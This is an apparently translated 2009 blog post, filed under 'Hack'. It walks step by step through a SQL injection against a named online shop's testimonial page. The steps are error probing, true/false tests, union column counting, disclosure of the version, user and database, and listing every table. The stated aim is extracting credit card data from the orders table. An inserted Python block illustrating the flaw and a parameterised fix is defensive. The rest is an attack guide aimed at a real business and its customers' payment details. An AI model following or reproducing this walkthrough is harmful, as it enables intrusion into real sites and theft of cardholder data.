hack shop php mysql injection 5.0

victim: https://www.185elgin.com/customer_te…timonial_id=25

Quote:
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

select * FROM customer_testimonials WHERE testimonials_id = 25\'

To tell whether this error is actually exploitable, we add a little more to the query:

https://www.185elgin.com/customer_te…timonial_id=25 and 1=1/*

This returns a page for the true condition (value 1).

https://www.185elgin.com/customer_te…timonial_id=25 and 1=0/*

This returns a page for the false condition (value 0).

If the site meets both conditions above, you can proceed to hack it.
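Why the two requests above return different pages, and the server-side fix, as an added example that is not part of the original post. Python's sqlite3 stands in for the shop's PHP/MySQL code, the table row is constructed, and the function names are hypothetical; the probes are the page's own (`'`, `and 1=1`, `and 1=0`) without the trailing comment marker.

```python
import re
import sqlite3

def make_db():
    # Constructed sample row standing in for the shop's customer_testimonials table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE customer_testimonials "
               "(testimonials_id INTEGER PRIMARY KEY, body TEXT)")
    db.execute("INSERT INTO customer_testimonials VALUES (25, 'Great service')")
    return db

def lookup_vulnerable(db, raw_id):
    # Hypothetical handler: the request value is pasted into the SQL text,
    # so whatever follows the number becomes part of the WHERE clause.
    sql = "SELECT body FROM customer_testimonials WHERE testimonials_id = " + raw_id
    return db.execute(sql).fetchall()

def lookup_hardened(db, raw_id):
    # 1) Allow-list: the id must be a short run of ASCII digits, nothing else.
    if not re.fullmatch(r"[0-9]{1,10}", raw_id):
        return None  # caller answers with a generic 404, never a database error
    # 2) Bound parameter: the value travels separately from the SQL text.
    sql = "SELECT body FROM customer_testimonials WHERE testimonials_id = ?"
    return db.execute(sql, (int(raw_id),)).fetchall()

def outcome(fn, db, raw_id):
    # Classify what a client can observe for one request value.
    try:
        rows = fn(db, raw_id)
    except sqlite3.Error:
        return "sql-error"  # corresponds to the verbose 1064 error page
    if rows is None:
        return "rejected"
    return "row" if rows else "empty"

PROBES = ["25", "25'", "25 and 1=1", "25 and 1=0"]

def observe(fn):
    db = make_db()
    return {probe: outcome(fn, db, probe) for probe in PROBES}

if __name__ == "__main__":
    print("vulnerable:", observe(lookup_vulnerable))
    print("hardened:  ", observe(lookup_hardened))
```

With the hardened handler the true and false probes are indistinguishable to the client and the quote never reaches the database. Database error text belongs in the server log, not in the response.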

Now we find out how many columns this site has in order to exploit the flaw.

https://www.185elgin.com/customer_te…,3,4,5,6,7,8–

Querying with 1 through 8 produces this output:

Quote:
Positions 3 and 6 show up; we will use position 3.
3

6

We use position 3 as the injection point, as shown below.

Now we find out which MySQL version the site runs so the approach can be adapted.

We should use the function concat_ws(0x3a,version(),user(),database()) to find it.

https://www.185elgin.com/customer_te…)),4,5,6,7,8–

So the MySQL version is 5.0.xx.

Quote:
5.0.51a-community:sendmc2_script@localhost:sendmc2_185elgin

At this point we can exploit it the MySQL 5.0 injection way.

Let's find the site's first table.

https://www.185elgin.com/customer_te…0limit%201,1–

Quote:
The first table returned is: COLLATIONS

A small trick for testers too lazy to query the tables one at a time: do it like this.

https://www.185elgin.com/customer_te…chema.tables–

Quote:

CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,address_book,address_format,banners,banners_history,card_surcharges,categories,categories_description,configuration,configuration_group,counter,counter_history,countries,currencies,customer_testimonials,customers,customers_basket,customers_basket_attributes,customers_info,geo_zones,languages,link_categories,link_categories_description,links,links_check,links_description,links_featured,links_status,links_to_link_categories,manufacturers,manufacturers_info,newsletters,orders,orders_maxmind,orders_products,orders_products_attributes,orders_products_download,orders_status,orders_status_history,orders_total,products,products_attributes,products_attributes_download,products_description,products_notifications,products_options,products_options_values,products_options_values_to_product

So now we have the first table and all the other tables of the site.

Now we look for the table that holds cc :d

Let's query the orders table to pull all the cc.

First the table name has to be converted to hex.

Go to http://www.vortex.prodigynet.co.uk/misc/ascii_conv.html
Converting orders gives 0x6F7264657273

https://www.185elgin.com/customer_te…0x6F7264657273

Quote:
orders_id

6
Click here to view all testimonials

Testimonial by 4
customers_id

6
Click here to view all testimonials

Testimonial by 4
customers_name

6
Click here to view all testimonials

…………………………………….

That's it; now we take the info needed to get the cc.

https://www.185elgin.com/customer_te…+from+orders–


This entry was posted on Friday, December 11th, 2009 and is filed under Hack.